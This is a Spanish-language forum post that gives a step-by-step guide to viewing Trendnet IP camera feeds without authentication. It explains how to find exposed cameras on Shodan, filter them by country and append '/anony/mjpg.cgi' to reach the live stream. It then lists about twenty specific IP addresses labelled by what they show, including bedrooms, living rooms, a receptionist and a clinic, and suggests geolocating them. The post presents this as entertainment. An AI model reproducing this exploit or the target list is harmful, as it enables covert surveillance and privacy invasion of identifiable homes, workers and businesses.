Te damos la bienvenida a la comunidad de T!Estás a un paso de acceder al mejor contenido, creado por personas como vos.

O iniciá sesión con
¿No tenés una cuenta?
Estimados taringueros, les dejo una pequeña guía para saltar la seguridad de algunas cámaras IP que andan dando vueltas por ahí.
Primero aclaro que esto no es un descubrimiento mio ni mucho menos, y que no me creo hacker ni nada parecido por esta pavada. Pero me resulto, útil, curioso y un tanto divertido y por eso lo comparto.

El post original con el descubrimiento y la explicación completa (en inglés) es este: http://console-cowboys.blogspot.com/2012/01/trendnet-cameras-i-always-feel-like.html


Primero aclarar que esto solo sirve para estas cámaras de Trendnet:

http://www.trendnet.com/products/proddetail.asp?prod=145_TV-IP110W

Bueno, la explicación:

1) Buscar cámaras que estén en Internet:

En primer lugar ingresamos a http://www.shodanhq.com/ y en el buscador escribimos "netcam". Da lo mismo si usamos comillas o no.



Aquí encontraremos todas las cámaras que este sitio pudo "esnifear" con su correspondiente identificación. No todas son las cámaras vulnerables. El primer filtro a tener en cuenta es que no sirven las que aparecen como "Netcam", es decir con la "N" en mayúsculas. Solo las que aparecen como "netcam".



El sitio nos permite filtrar por país la búsqueda. Para hacerlo escribimos en el buscador lo siguiente:

netcam country:Código de país

El código de país es el asignado por la IANA y pueden consultarse acá: http://es.wikipedia.org/wiki/Categor%C3%ADa:Dominios_de_Internet_por_pa%C3%ADs.

Así, por ejemplo, si queremos buscar cámaras de Argentina deberíamos escribir en el buscador:

netcam country:AR




2) Visitar las cámaras:

Para ver cada una de las cámaras encontradas (en caso de que estén activas, transmitiendo y sean realmente el modelo afectado por esta vulnerabilidad) debemos copiar al IP que nos da el sitio shodanhq en nuestro navegador y agregarle la extensión: /anony/mjpg.cgi.

Así, por ejemplo, la URL para acceder a una cámara sería:
http://190.190.17.43/anony/mjpg.cgi




Si se registran en el sitio Shodanhq pueden acceder a más resultados, y si pagan a todavía muchos más. Pero con los que trae inicialmente hay para divertirse un rato.

Les dejo algunas de las cámaras que yo encontré "trabajando" :

http://69.245.82.113/anony/mjpg.cgi Cama



http://109.189.232.87/anony/mjpg.cgi Living



http://74.77.194.152/anony/mjpg.cgi Calle



http://65.182.79.56/anony/mjpg.cgi Recepcion



http://66.25.25.182/anony/mjpg.cgi Otra cama



http://152.14.56.160/anony/mjpg.cgi Depósito/Sala de máquinas



http://67.33.52.88/anony/mjpg.cgi Estacionamiento



http://99.169.70.179/anony/mjpg.cgi Living



http://72.214.3.171/anony/mjpg.cgi Recepción (con secretaria)



http://190.92.17.124/anony/mjpg.cgi Oficina chiquita



http://69.198.183.90/anony/mjpg.cgi Consultorio



http://75.38.134.11/anony/mjpg.cgi Comedor antiguo



http://67.180.241.51/anony/mjpg.cgi Pecera copada



http://173.14.102.131/anony/mjpg.cgi Callcenter



http://76.175.108.140/anony/mjpg.cgi Living departamento



http://187.142.125.94/anony/mjpg.cgi Venta de celulares en Mexico



http://190.190.17.43/anony/mjpg.cgi PH Argento (Lanus)



http://200.120.141.238/anony/mjpg.cgi Tienda de deportes en Chile



http://200.32.183.116/anony/mjpg.cgi Comercio en Chile



http://200.32.183.124/anony/mjpg.cgi Mostrador/comercio en Chile



Dato curioso:
Si quieren saber a que dirección aproximada pertenece la IP de alguna de las cámaras pueden ingresar a http://www.ipaddresslocation.org/ e ingresar la IP de la cámara en dónde dice "Track IP":